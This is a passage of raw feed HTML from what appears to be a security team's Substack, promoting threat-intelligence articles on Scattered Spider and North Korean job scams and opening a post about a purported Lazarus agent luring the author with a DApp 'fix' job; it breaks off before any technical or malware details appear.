data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;normal&quot;,&quot;height&quot;:806,&quot;width&quot;:806,&quot;resizeWidth&quot;:160,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:&quot;center&quot;,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OEMf!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png 424w, https://substackcdn.com/image/fetch/$s_!OEMf!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png 848w, https://substackcdn.com/image/fetch/$s_!OEMf!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png 1272w, https://substackcdn.com/image/fetch/$s_!OEMf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png 1456w" sizes="100vw"></picture><div></div></div></a></figure></div><p>Before joining <strong>Bitso</strong> and the <strong>Quetzal Team</strong>, <strong>Jos&#233;</strong> had the chance to confront the infamous <strong><a href="https://www.crowdstrike.com/adversaries/scattered-spider/">Scattered Spider</a></strong> group &#8212; an epic task that left him with a few valuable lessons. He used those insights to profile the group and share his findings in this article, titled <em>&#8220;<strong>Arachnophobia: How Scattered Spider Hunts.</strong>&#8221;</em></p><p>What could have been a horror story turned into an excellent technical profile of one of the most vicious threats out there.</p><div><hr></div><h2>Chollimas</h2><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!lFIr!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!lFIr!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png 424w, https://substackcdn.com/image/fetch/$s_!lFIr!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png 848w, https://substackcdn.com/image/fetch/$s_!lFIr!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png 1272w, https://substackcdn.com/image/fetch/$s_!lFIr!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!lFIr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png" width="160" height="159.4103194103194" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:811,&quot;width&quot;:814,&quot;resizeWidth&quot;:160,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!lFIr!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png 424w, https://substackcdn.com/image/fetch/$s_!lFIr!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png 848w, https://substackcdn.com/image/fetch/$s_!lFIr!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png 1272w, https://substackcdn.com/image/fetch/$s_!lFIr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd981a0f1-77cc-437b-b768-9f9e603cb9b0_814x811.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Mauro shared <strong>&#8220;PhishedIn: Kim Jong Un Has Invited You to Connect&#8221;</strong>, based on the <strong>DragonJAR 2024</strong> and <strong>Hacker Halted 2024</strong> talk of the same name, co-presented with Ulises.</p><p>Expanded with the latest <s>gossip</s> threat intelligence, new indicators and activity, the article explains in simple terms how dedicated <strong>state-sponsored industrial spies</strong> are targeting the crypto and fintech sectors with all kinds of scams &#8212; fake job interviews, one-shot gigs, fake VCs, business calls, and more.</p><div><hr></div><p>Both articles are available in <strong><a href="https://pagedout.institute/download/PagedOut_006.pdf">Issue #6</a></strong> (pages 67 &amp; 76) &#8212; <strong>free to read.</strong></p><p>Enjoy!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Interview with the Chollima]]></title><description><![CDATA[Lazarus tried to trick us... And we ended up stealing their malware]]></description><link>https://quetzal.bitso.com/p/interview-with-the-chollima</link><guid isPermaLink="false">https://quetzal.bitso.com/p/interview-with-the-chollima</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Fri, 11 Apr 2025 21:15:51 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!P7nk!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!P7nk!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!P7nk!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic 424w, https://substackcdn.com/image/fetch/$s_!P7nk!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic 848w, https://substackcdn.com/image/fetch/$s_!P7nk!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic 1272w, https://substackcdn.com/image/fetch/$s_!P7nk!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!P7nk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic" width="300" height="450" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:1024,&quot;resizeWidth&quot;:300,&quot;bytes&quot;:247057,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!P7nk!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic 424w, https://substackcdn.com/image/fetch/$s_!P7nk!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic 848w, https://substackcdn.com/image/fetch/$s_!P7nk!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic 1272w, https://substackcdn.com/image/fetch/$s_!P7nk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b202dec-6694-40b0-8e7e-c4b6660bded1_1024x1536.heic 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption"><strong>Another year, another Chollima added to our trophy wall.</strong></figcaption></figure></div><p>February came and went once again, this time without a peep from our dear friends behind the <strong><a href="https://www.fbi.gov/wanted/cyber/apt-41-group">Great Firewall</a></strong>, nor from those under the menacing guise of the <strong><a href="https://attack.mitre.org/groups/G0032/">Great Leader</a></strong>. Not that I missed them, but something felt&#8230; off. </p><p>Had they forgotten about us? Are we no longer <em>that</em> important of a target? Did they simply decide to move on and forgive us every time we mocked them publicly&#8212;when their <strong>ACME</strong>-branded malware blew up in their faces, giving us the chance to weaponize it into <a href="https://docs.google.com/presentation/d/1mQuauuJCdDI9d_HfIvLdtk_vM4FU4v0AUmlTShV9_hI/edit">talks</a> and <a href="https://phrack.org/issues/71/3">articles</a> at the best conferences and magazines in the world? </p><p>No, I don&#8217;t think they&#8217;re the type to turn the other cheek. They waited until April to fine-tune the stockade after planning something highly targeted. At us.</p><p>Well, at me.</p><div><hr></div><h2>The North Korean Job</h2><p>It all started in the <a href="https://www.linkedin.com">most vicious hunting ground for Threat Actors</a>, when a <s>muppet</s> well-respected <strong><a href="https://en.wikipedia.org/wiki/Lazarus_Group">Lazarus</a></strong> agent approached me carelessly under the name "Wilton Santos",  asking if I was open to working on a fix for its <strong><a href="https://en.wikipedia.org/wiki/Decentralized_application">DApp</a></strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!aWA7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!aWA7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!aWA7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!aWA7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!aWA7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!aWA7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png" width="1456" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1584961,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!aWA7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!aWA7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!aWA7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!aWA7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5492cf6-3372-4713-adbe-8fb605371195_3222x2098.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I asked for further clarification, and the sad story rolled in: they were a team of seven developers, but <strong>all of them were on vacation</strong> (bad human resources planning there), and needed a trivial but urgent fix on its UI.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!W-E7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!W-E7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!W-E7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!W-E7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!W-E7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!W-E7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png" width="1456" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1583026,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!W-E7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!W-E7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!W-E7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!W-E7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6b809a7a-5c08-4e07-b3d2-a68176e166ad_3222x2098.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The DApp was &#8220;<strong>Gamba v2</strong>&#8221;, a gaming platform where users could join by connecting with their wallets (you might think this is the strike point, but that would be too obvious). The <em>UI problem</em> was that they wanted to dynamically display the user&#8217;s wallet in a specific profile button. This is pretty trivial, and many JS libraries can do it in two or three lines of code.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5VVF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5VVF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!5VVF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!5VVF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!5VVF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5VVF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png" width="1456" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1222565,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!5VVF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png 424w, https://substackcdn.com/image/fetch/$s_!5VVF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png 848w, https://substackcdn.com/image/fetch/$s_!5VVF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png 1272w, https://substackcdn.com/image/fetch/$s_!5VVF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F17c818d8-314c-4d2b-b3aa-c80aacbed6bd_3222x2098.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 